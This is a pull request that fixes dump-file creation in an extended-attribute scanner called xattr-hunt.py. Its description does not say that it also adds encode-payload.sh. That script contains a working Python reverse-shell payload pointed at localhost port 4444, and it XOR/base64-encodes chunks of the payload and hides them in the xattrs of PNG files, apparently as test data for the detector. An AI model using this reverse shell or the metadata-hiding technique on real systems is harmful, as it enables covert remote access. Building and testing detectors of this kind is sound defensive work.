### PR TITLE
Fix a bug where dump files were not being created

### DIFF
--- a/encode-payload.sh
+++ b/encode-payload.sh
@@ -1,0 +1,34 @@
+#!/bin/bash
+# Encode a payload into extended attributes
+# https://isc.sans.edu/diary/32116
+
+# Simple payload
+PAYLOAD='import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+CHUNK_SIZE=32
+CHUNKS=()
+i=0
+# Split the payload in chunks of 32 bytes
+while [ $((i * CHUNK_SIZE)) -lt ${#PAYLOAD} ]; do
+  CHUNK=${PAYLOAD:$((i * CHUNK_SIZE)):CHUNK_SIZE}
+  CHUNKS+=("$CHUNK")
+  ((i++))
+done
+
+# Encoding chunks and save extended attributes
+echo "Payload:"
+echo "$PAYLOAD"
+echo
+echo "Chunk count: ${#CHUNKS[@]}"
+for idx in "${!CHUNKS[@]}"; do
+  # Duplicate a simple picture
+  cp isc.png picture-"$idx".png
+  # XOR + Base64 encoding with the key 0xFB
+  echo -n "${CHUNKS[$idx]}" \
+    | python3 -c "import sys; sys.stdout.buffer.write(bytes([b ^ 0xFB for b in sys.stdin.buffer.read()]))" \
+    | base64 -w0 > tmp && mv tmp "picture-$idx.b64"
+  echo "CHUNK$((idx + 1)) = ${CHUNKS[$idx]} ($(cat picture-"$idx".b64))"
+  # Save the payload
+  setfattr -n user.payload -v "$(cat picture-"$idx".b64)" picture-"$idx".png
+  rm picture-"$idx".b64
+done

--- a/xattr-hunt.py
+++ b/xattr-hunt.py
@@ -13,12 +13,11 @@ import base64
 import hashlib
 import os
 import re
-import stat
 import subprocess
 import sys
 
 try:
-    from typing import Optional, Tuple, List
+    from typing import List, Optional, Tuple
 except Exception:
     # Minimal fallback for very old envs
     Optional = None
@@ -155,8 +154,7 @@ def get_xattr(path, name):
 def safe_str(x):
     if isinstance(x, bytes):
         return(x.decode("utf-8", "backslashreplace"))
-    else:
-        return(str(x))
+    return(str(x))
 
 def main():
     ap = argparse.ArgumentParser(description="Scan filesystem for long xattrs and identify content (defensive).")
@@ -174,7 +172,7 @@ def main():
     try:
         top_stat = os.lstat(start)
     except OSError:
-        sys.stderr.write("ERROR: start path not found: {0}\n".format(start))
+        sys.stderr.write(f"ERROR: start path not found: {start}\n")
         sys.exit(1)
 
     if args.dump_dir:
@@ -186,7 +184,7 @@ def main():
     try:
         ns_re = re.compile(args.ns_regex.encode("utf-8"))
     except Exception as e:
-        sys.stderr.write("ERROR: invalid regex for --ns: {0}\n".format(e))
+        sys.stderr.write(f"ERROR: invalid regex for --ns: {e}\n")
         sys.exit(1)
 
     # Header
@@ -227,36 +225,28 @@ def main():
                 if mime == "text/plain" and mime2 != "-":
                     mime, magic = mime2, magic2
                 if note:
-                    note = note + ", " + "looks-like-base64→{0}".format(mime2)
+                    note = note + ", " + f"looks-like-base64→{mime2}"
                 else:
-                    note = "looks-like-base64→{0}".format(mime2)
+                    note = f"looks-like-base64→{mime2}"
 
             sha = hashlib.sha256(final_buf).hexdigest()
 
             dump_path = ""
             if args.dump_dir:
                 try:
-                    try:
-                        attr_str = name.decode("utf-8")
-                    except Exception:
-                        attr_str = name.decode("utf-8", "backslashreplace")
-                    safe_attr = attr_str.replace("/", "_").replace(":", "_").replace(" ", "_")
+                    attr_str = safe_str(name)
+                    safe_attr = attr_str.replace("/", "_").replace(":", "_").replace(" ", "_").replace("\\", "_")
                     base = os.path.basename(path) or "inode"
-                    dump_name = "{0}_{1}_{2}.bin".format(sha[:12], base, safe_attr)
+                    dump_name = f"{sha[:12]}_{base}_{safe_attr}.bin"
                     dump_path = os.path.join(args.dump_dir, dump_name)
                     with open(dump_path, "wb") as f:
                         f.write(final_buf)
-                except Exception:
+                except Exception as err:
+                    sys.stderr.write(f"[!] Dump failed for {path}:{name} → {err}\n")
                     dump_path = ""
 
-            try:
-                attr_print = safe_str(name)
-            except Exception:
-                attr_print = name.decode("utf-8", "backslashreplace")
-
-            sys.stdout.write("{bytes}\t{file}\t{attr}\t{mime}\t{magic}\t{sha}\t{note}\t{dump}\n".format(
-                bytes=nbytes, file=path, attr=attr_print, mime=mime, magic=magic, sha=sha, note=note, dump=dump_path
-            ))
+            attr_print = safe_str(name)
+            sys.stdout.write(f"{nbytes}\t{path}\t{attr_print}\t{mime}\t{magic}\t{sha}\t{note}\t{dump_path}\n")
 
 if __name__ == "__main__":
     main()


### PR DESCRIPTION
This PR fixes a bug where dump files are not created.

```
john@john-virtual-machine:~/imgs/xattr$ python3 ./xattr-hunt.py ./ 10 --dump-dir ./dump
bytes	file	attribute	mime	magic	sha256	note	dump_path
44	/home/john/imgs/xattr/picture-4.png	user.payload	text/plain	Non-ISO extended-ASCII text, with no line terminators	5d98fceda87556918f5ceea1acbb08b165850ed982d8ecdb70700537e36c9c73	looks-like-base64→text/plain	
28	/home/john/imgs/xattr/picture-6.png	user.payload	text/plain	PGP Secret Sub-key -	cadf1adc2ccb8124753150417f4088269e2b29667af3d9a4989ef9c284e6c64f	looks-like-base64→text/plain	
44	/home/john/imgs/xattr/picture-5.png	user.payload	text/plain	Non-ISO extended-ASCII text, with no line terminators	b505d42131a76f0b6cbd16cb1fa2a727381941e361035a58ae6eadba707b103f	looks-like-base64→text/plain	
44	/home/john/imgs/xattr/picture-0.png	user.payload	text/plain	Non-ISO extended-ASCII text, with no line terminators	d270df7f08a77bc2bf24b27d7ec0b039b0f331296dc9e36db45c37bfbba37599	looks-like-base64→text/plain	
44	/home/john/imgs/xattr/picture-3.png	user.payload	text/plain	Non-ISO extended-ASCII text, with no line terminators	6e38240123fbee859e6ec85ef44c9140b0c603a35049dd1a6c8d2569927720c5	looks-like-base64→text/plain	
44	/home/john/imgs/xattr/picture-2.png	user.payload	text/plain	Non-ISO extended-ASCII text, with no line terminators	0f075e6e50b2d43883c810dbf4fd536de4cb5fd54171f281fe8a51ea7758cba9	looks-like-base64→text/plain	
44	/home/john/imgs/xattr/picture-1.png	user.payload	text/plain	OpenPGP Public Key	e596702c584137c342d10ddc6d1ad502a1994f93e5363a3c384657438c168c46	looks-like-base64→text/plain	
john@john-virtual-machine:~/imgs/xattr$ ls -al ./dump/
total 8
drwxrwxr-x 2 john john 4096 10月 24 10:47 .
drwxrwxr-x 3 john john 4096 10月 24 10:47 ..
```
